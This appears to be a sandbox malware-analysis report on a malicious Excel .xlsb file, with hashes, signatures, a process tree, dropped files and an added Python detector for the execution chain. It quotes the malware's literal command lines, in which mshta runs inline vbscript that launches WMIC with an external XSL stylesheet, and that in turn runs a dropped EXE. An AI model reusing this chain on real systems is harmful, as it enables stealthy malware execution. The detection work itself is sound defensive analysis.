Analysis

  • max time kernel
    147s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-07-2021 16:34

General

  • Target

    B6B2406B.xlsb

  • Size

    399KB

  • MD5

    9746382b9bd6beec5889ce3256dea9ef

  • SHA1

    1d12104d6309d98565193337eb546943eaeea959

  • SHA256

    205f42a518914e75620077ed79b9016b48f657d305ef892c6633fa6397463680

  • SHA512

    cfcfa74c464fd67941f35711ec602256fe8fed0ae9b49634ef9d9794f5f92e55f765a4479dcb71241731df0d149a20b2064e6bba5b8bc3f5f8c9599ac152557c

Malware Config

Signatures

  • suricata: ET MALWARE Maldoc Retrieving Payload 2021-07-06
  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\B6B2406B.xlsb"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3932
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2892
    • \??\c:\windows\system32\mshta.EXE
      c:\windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qOtherSessionChanges.xsl"" & Chr(34)),0:close")
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\System32\wbem\WMIC.exe
        "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qOtherSessionChanges.xsl"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:504
        • C:\Windows\Temp\sr2mq.exe
          "C:\Windows\Temp\sr2mq.exe"
          3⤵
          • Executes dropped EXE
          PID:852
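
The tree above is the whole chain in five process launches: Excel opens the .xlsb, mshta.exe is handed an inline vbscript: URI rather than an .hta file, that script starts WMIC with /format: pointing at a local .xsl stylesheet in C:\ProgramData (WMIC evaluates script embedded in a stylesheet, ATT&CK T1220 XSL Script Processing, which is why the "Blocklisted process makes network request" hit lands on WMIC.exe), and WMIC in turn launches the dropped sr2mq.exe from C:\Windows\Temp. The following detection logic is an added example and is not part of this report or the sandbox's own signatures. The event records are constructed from the process tree shown here in a Sysmon-style pid/ppid/image/cmdline shape (field names are an assumption); mshta is given ppid 0 because the report shows it at the root of the tree without a recorded parent, and the trailing wmic /format:csv record is a constructed benign control.

```python
"""Flag the mshta -> WMIC /format:<xsl> -> dropped EXE chain from process-creation telemetry."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style; field set is an assumption)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the process tree in this report; ppid 0 = parent not recorded.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(3932, 0, r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\B6B2406B.xlsb"'),
    ProcEvent(2892, 3932, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    ProcEvent(1988, 0, r"\??\c:\windows\system32\mshta.EXE",
              r'c:\windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qOtherSessionChanges.xsl"" & Chr(34)),0:close")'),
    ProcEvent(504, 1988, r"C:\Windows\System32\wbem\WMIC.exe",
              r'"C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qOtherSessionChanges.xsl"'),
    ProcEvent(852, 504, r"C:\Windows\Temp\sr2mq.exe", r'"C:\Windows\Temp\sr2mq.exe"'),
    # Constructed benign control: an admin using a built-in output format keyword.
    ProcEvent(4100, 4000, r"C:\Windows\System32\wbem\WMIC.exe", r"wmic os get /format:csv"),
]

# mshta.exe given a script protocol handler instead of an .hta file path
INLINE_SCRIPT_RE = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)
# wmic /format:<value>; built-in keywords (csv, list, xml, ...) carry no path or extension
FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)', re.IGNORECASE)
# Directories a freshly dropped payload is typically executed from
TEMP_DIRS = ("c:\\windows\\temp\\", "\\appdata\\local\\temp\\")


def basename(path: str) -> str:
    """Lower-cased final path component; tolerates the \\??\\ NT prefix seen in the tree."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def mshta_inline_script(ev: ProcEvent) -> bool:
    return basename(ev.image) == "mshta.exe" and bool(INLINE_SCRIPT_RE.search(ev.cmdline))


def wmic_external_xsl(ev: ProcEvent) -> Optional[str]:
    """Return the /format: target when it is a file path or URL rather than a built-in keyword."""
    if basename(ev.image) != "wmic.exe":
        return None
    m = FORMAT_RE.search(ev.cmdline)
    if not m:
        return None
    target = m.group(1)
    if any(c in target for c in "\\/:") or target.lower().endswith(".xsl"):
        return target
    return None


def runs_from_temp(ev: ProcEvent) -> bool:
    return any(d in ev.image.lower() for d in TEMP_DIRS)


def analyze(events: List[ProcEvent]) -> Dict[int, Set[str]]:
    """Map each suspicious pid to the set of rule names it triggered."""
    findings: Dict[int, Set[str]] = {}
    by_pid = {ev.pid: ev for ev in events}

    def hit(pid: int, rule: str) -> None:
        findings.setdefault(pid, set()).add(rule)

    for ev in events:
        if mshta_inline_script(ev):
            hit(ev.pid, "mshta_inline_script")
        if wmic_external_xsl(ev) is not None:
            hit(ev.pid, "wmic_xsl_script_processing")
        if runs_from_temp(ev):
            hit(ev.pid, "exec_from_temp")
        # Anything launched by a WMIC that loaded an external stylesheet is the payload stage.
        parent = by_pid.get(ev.ppid)
        if parent is not None and wmic_external_xsl(parent) is not None:
            hit(ev.pid, "spawned_by_wmic_xsl")
    return findings


if __name__ == "__main__":
    for pid, rules in sorted(analyze(SAMPLE_EVENTS).items()):
        print(pid, sorted(rules))
```

The WMIC rule deliberately does not try to enumerate the built-in format names: a keyword such as csv or list is resolved to a stylesheet under System32\wbem, so anything that carries a path separator, a drive or URL colon, or an .xsl extension is an operator-supplied stylesheet and worth an alert on its own, independent of the mshta parent. Correlating the WMIC child (rule spawned_by_wmic_xsl) with execution from a temp directory is what separates this chain from an admin querying WMI with a custom report template.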

    Network

    MITRE ATT&CK Matrix (ATT&CK v6)

    Discovery
      • System Information Discovery (T1082): 3 signatures
      • Query Registry (T1012): 2 signatures

    Downloads

    • C:\ProgramData\qOtherSessionChanges.xsl
      MD5

      fde8ba6b6f6f06695ba8e05b7b76f065

      SHA1

      30c61a9ad4f6bc33a2ebe5b3a5615c16b478ec1a

      SHA256

      abf29b8f7c858fcdabf46347fcdb62f497910f7360452ecf6a144214949b1157

      SHA512

      10c60dfddbc31c1d70fddf189d88d3bbf689baa28b065d4a589b7ef2911ef04d5238cb581e89e478157ba8c2d6b812f09c8c1ebc62098a0d64b8181b35d4f28f

    • C:\Windows\Temp\sr2mq.exe
      MD5

      9a2e1bb9ad6f1ccfeaa4c2c55637ae3b

      SHA1

      d42d55cab8637f847efdc1a01bcd5bb2d4668b7d

      SHA256

      b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6

      SHA512

      c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6

    • memory/504-331-0x0000000000000000-mapping.dmp
    • memory/852-333-0x0000000000000000-mapping.dmp
    • memory/2892-260-0x0000000000000000-mapping.dmp
    • memory/3932-118-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-123-0x00000116A1F10000-0x00000116A3E05000-memory.dmp
      Filesize

      31.0MB

    • memory/3932-122-0x00007FF9EFDA0000-0x00007FF9F0E8E000-memory.dmp
      Filesize

      16.9MB

    • memory/3932-326-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-327-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-328-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-329-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-121-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-114-0x00007FF7F58C0000-0x00007FF7F8E76000-memory.dmp
      Filesize

      53.7MB

    • memory/3932-117-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-116-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-115-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB